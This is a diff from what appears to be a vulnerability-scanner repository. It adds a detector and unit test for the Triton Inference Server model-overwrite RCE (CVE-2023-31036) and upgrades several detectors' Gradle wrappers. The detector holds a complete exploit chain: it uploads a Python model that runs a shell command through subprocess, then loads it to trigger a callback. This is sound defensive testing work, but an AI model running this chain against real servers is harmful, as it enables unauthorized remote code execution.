+ + "parameters [\n" + + " {\n" + + " key: \"INFERENCE_MODE\"\n" + + " value: { string_value: \"true\" }\n" + + " }\n" + + "]\n"; + + @VisibleForTesting + static final String PYTHON_MODEL = + "import subprocess\n" + + "class TritonPythonModel:\n" + + " def initialize(self, args):\n" + + " subprocess.run(\"%s\",shell=True)\n" + + " def execute(self, requests):\n" + + " return\n" + + " def finalize(self):\n" + + " return"; + + private final HttpClient httpClient; + private final Clock utcClock; + + @Inject + TritonInferenceServerRceVulnDetector( + HttpClient httpClient, @UtcClock Clock utcClock, PayloadGenerator payloadGenerator) { + this.httpClient = checkNotNull(httpClient); + this.utcClock = checkNotNull(utcClock); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("TritonInferenceServerRceVulnDetector starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + @VisibleForTesting + String buildRootUri(NetworkService networkService) { + return buildWebApplicationRootUrl(networkService); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + var payload = getTsunamiCallbackHttpPayload(); + if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atWarning().log( + "The Tsunami callback server is not setup for this environment, so we cannot confirm the" + + " RCE callback"); + return false; + } + + String cmd = payload.getPayload(); + + final String rootUri = buildRootUri(networkService); + + try { + HttpResponse modelNames = + httpClient.send( + post(rootUri + "v2/repository/index").withEmptyHeaders().build(), networkService); + + if (modelNames.bodyString().isEmpty()) { + return false; + } + JsonArray modelNamesJo = + JsonParser.parseString(modelNames.bodyString().get()).getAsJsonArray(); + if (modelNamesJo.isJsonNull()) { + return false; + } + String anExistingModelName = null; + for (JsonElement modelNameJe : modelNamesJo) { + if (modelNameJe.isJsonObject()) { + JsonObject jsonObject = modelNameJe.getAsJsonObject(); + if (jsonObject.has("name")) { + anExistingModelName = jsonObject.get("name").getAsString(); + break; + } + } + } + if (anExistingModelName == null) { + return false; + } + // Attempting to unload model + httpClient.send( + post(String.format(rootUri + "v2/repository/models/%s/unload", anExistingModelName)) + .withEmptyHeaders() + .build(), + networkService); + + // Creating model repo layout: uploading model config + httpClient.send( + post(String.format(rootUri + "v2/repository/models/%s/load", anExistingModelName)) + .setHeaders(HttpHeaders.builder().addHeader(CONTENT_TYPE, "application/json").build()) + .setRequestBody( + ByteString.copyFromUtf8( + String.format( + UPLOAD_CONFIG_PAYLOAD, + Base64.getEncoder() + .encodeToString( + String.format(MODEL_CONFIG, anExistingModelName).getBytes())))) + .build(), + networkService); + + // Creating model repo layout: uploading the model + httpClient.send( + post(String.format(rootUri + "v2/repository/models/%s/load", anExistingModelName)) + .setHeaders(HttpHeaders.builder().addHeader(CONTENT_TYPE, "application/json").build()) + .setRequestBody( + ByteString.copyFromUtf8( + String.format( + UPLOAD_MODEL_PAYLOAD, + Base64.getEncoder() + .encodeToString(String.format(PYTHON_MODEL, cmd).getBytes())))) + .build(), + networkService); + + // Loading model to trigger payload + httpClient.send( + post(String.format(rootUri + "v2/repository/models/%s/load", anExistingModelName)) + .withEmptyHeaders() + .build(), + networkService); + } catch (RuntimeException | IOException e) { + logger.atWarning().withCause(e).log( + "Fail to exploit '%s'. Maybe it is not vulnerable", rootUri); + return false; + } + + // If there is an RCE, the execution isn't immediate + logger.atInfo().log("Waiting for RCE callback."); + try { + Thread.sleep(10000); + } catch (InterruptedException e) { + logger.atWarning().withCause(e).log("Failed to wait for RCE result"); + return false; + } + if (payload.checkIfExecuted()) { + logger.atInfo().log("RCE payload executed!"); + return true; + } + return false; + } + + private Payload getTsunamiCallbackHttpPayload() { + try { + return this.payloadGenerator.generate( + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build()); + } catch (NotImplementedException n) { + return null; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("TritonInferenceServerRce")) + .setSeverity(Severity.CRITICAL) + .setTitle("Triton Inference Server RCE") + .setDescription( + "This detector checks triton inference server RCE with explicit model-control" + + " option enabled. \n" + + "All versions of triton inference server with the `--model-control" + + " explicit` option allows for loaded models to be overwritten by " + + " malicious models and lead to RCE.") + .setRecommendation("don't use `--model-control explicit` option with public access") + .addRelatedId( + VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-31036"))) + .build(); + } +} diff --git a/community/detectors/triton_inference_server_model_overwrite/src/test/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetectorTest.java b/community/detectors/triton_inference_server_model_overwrite/src/test/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetectorTest.java new file mode 100644 index 000000000..8652f5b4d --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/src/test/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetectorTest.java @@ -0,0 +1,221 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.rce; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; +import static com.google.tsunami.plugins.detectors.rce.TritonInferenceServerRceVulnDetector.MODEL_CONFIG; +import static com.google.tsunami.plugins.detectors.rce.TritonInferenceServerRceVulnDetector.PYTHON_MODEL; +import static com.google.tsunami.plugins.detectors.rce.TritonInferenceServerRceVulnDetector.UPLOAD_CONFIG_PAYLOAD; +import static com.google.tsunami.plugins.detectors.rce.TritonInferenceServerRceVulnDetector.UPLOAD_MODEL_PAYLOAD; +import static java.nio.charset.StandardCharsets.UTF_8; + +import com.google.common.collect.ImmutableList; +import com.google.common.truth.Truth; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.security.SecureRandom; +import java.time.Instant; +import java.util.Arrays; +import java.util.Base64; +import java.util.Objects; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link TritonInferenceServerRceVulnDetector}. */ +@RunWith(JUnit4.class) +public final class TritonInferenceServerRceVulnDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2024-12-03T00:00:00.00Z")); + + private final MockWebServer mockTargetService = new MockWebServer(); + private final MockWebServer mockCallbackServer = new MockWebServer(); + + @Inject private TritonInferenceServerRceVulnDetector detector; + + TargetInfo targetInfo; + NetworkService targetNetworkService; + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServer) + .setSecureRng(testSecureRandom) + .build(), + new TritonInferenceServerRceDetectorBootstrapModule()) + .injectMembers(this); + } + + @After + public void tearDown() throws Exception { + mockTargetService.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + startMockWebServer(true); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("TritonInferenceServerRce")) + .setSeverity(Severity.CRITICAL) + .setTitle("Triton Inference Server RCE") + .setDescription( + "This detector checks triton inference server RCE with explicit" + + " model-control option enabled. \n" + + "All versions of triton inference server with the" + + " `--model-control explicit` option allows for loaded models to" + + " be overwritten by malicious models and lead to RCE.") + .setRecommendation( + "don't use `--model-control explicit` option with public access") + .addRelatedId( + VulnerabilityId.newBuilder() + .setPublisher("CVE") + .setValue("CVE-2023-31036"))) + .build()); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(5); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln() throws IOException { + startMockWebServer(false); + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(1); + } + + private void startMockWebServer(boolean withAnExistingModel) throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + @Override + public MockResponse dispatch(RecordedRequest request) { + // get an existing model name + if (withAnExistingModel + && Objects.equals(request.getPath(), "/v2/repository/index") + && request.getMethod().equals("POST")) { + return new MockResponse().setBody("[{\"name\":\"metasploit\"}]").setResponseCode(200); + } + // Attempting to unload model + if (Objects.equals(request.getPath(), "/v2/repository/models/metasploit/unload")) { + if (request.getMethod().equals("POST")) { + return new MockResponse().setResponseCode(200); + } + } + // Creating model repo layout: uploading the model + // Or Creating model repo layout: uploading model config + if (Objects.equals(request.getPath(), "/v2/repository/models/metasploit/load")) { + if (request.getMethod().equals("POST") + && !request.getBody().readString(StandardCharsets.UTF_8).isEmpty() + && Objects.requireNonNull(request.getHeaders().get("Content-Type")) + .equals("application/json") + && (Objects.equals( + request.getBody().readString(StandardCharsets.UTF_8), + String.format( + UPLOAD_CONFIG_PAYLOAD, + Base64.getEncoder() + .encodeToString( + String.format(MODEL_CONFIG, "metasploit").getBytes(UTF_8)))) + || request + .getBody() + .readString(StandardCharsets.UTF_8) + .startsWith( + String.format( + UPLOAD_MODEL_PAYLOAD, + Base64.getEncoder() + .encodeToString( + PYTHON_MODEL.substring(0, 20).getBytes(UTF_8)))))) { + return new MockResponse().setResponseCode(200); + } + } + // Loading model to trigger payload + if (Objects.equals(request.getPath(), "/v2/repository/models/metasploit/load")) { + if (request.getMethod().equals("POST") + && request.getBody().readString(StandardCharsets.UTF_8).isEmpty()) { + return new MockResponse().setResponseCode(200); + } + } + return new MockResponse().setBody("[{}]").setResponseCode(200); + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + + targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } +} diff --git a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.jar b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.properties b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew +++ b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew.bat b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew.bat +++ b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.jar b/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.jar and b/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.jar differ diff --git a/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.properties b/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.properties +++ b/doyensec/detectors/kubernetes_rce_via_open_access/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/doyensec/detectors/kubernetes_rce_via_open_access/gradlew b/doyensec/detectors/kubernetes_rce_via_open_access/gradlew index fbd7c5158..1aa94a426 100755 --- a/doyensec/detectors/kubernetes_rce_via_open_access/gradlew +++ 